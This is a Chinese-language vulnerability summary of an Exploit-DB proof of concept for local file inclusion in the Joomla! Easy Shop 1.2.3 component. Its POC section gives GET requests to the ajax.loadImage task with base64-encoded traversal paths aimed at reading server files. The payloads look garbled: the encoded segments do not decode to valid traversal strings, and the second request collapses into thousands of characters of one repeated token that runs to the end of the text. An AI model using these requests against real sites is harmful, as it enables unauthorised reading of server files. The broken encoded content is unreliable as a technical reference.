漏洞概述 漏洞名称: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion EDB-ID: 46219 作者: Ihsan Sencan 类型: Webapps 平台: PHP 日期: 2019-01-22 漏洞描述: 该漏洞允许攻击者通过本地文件包含(LFI)漏洞读取服务器上的敏感文件。 影响范围 受影响软件: Joomla! Component Easy Shop 1.2.3 测试环境: WIN7 x64/KaliLinux x64 漏洞利用条件: 需要知道目标网站的路径([PATH]) 修复方案 官方链接: Joomla! Extensions 建议措施: 更新到最新版本或应用官方提供的补丁。 POC代码 ```plaintext Exploit Title: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion Dork: N/A Date: 2019-01-22 Exploit Author: Ihsan Sencan Vendor Homepage: https://joomtech.net/ Software D.: https://www.joomtech.net/products/easyshop?task=file.download&key=7ba4aafda5995fb3b1383328165df1e10f Software Link: https://extensions.joomla.org/extensions/e-commerce/shopping-cart/easy-shop/ Version: 1.2.3 Category: Webapps Tested on: WIN7 x64/KaliLinux x64 CVE: N/A POC: 1) http://localhost/[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=[BASE64_FILE_NAME] GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Ll4vLl4vY29uZmldXJhdGlvb1SwMA== HTTP/1.1 GET /[PATH]/index.php?option=com_easyshop&task=ajax.loadImage&file=Ll4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl4vLl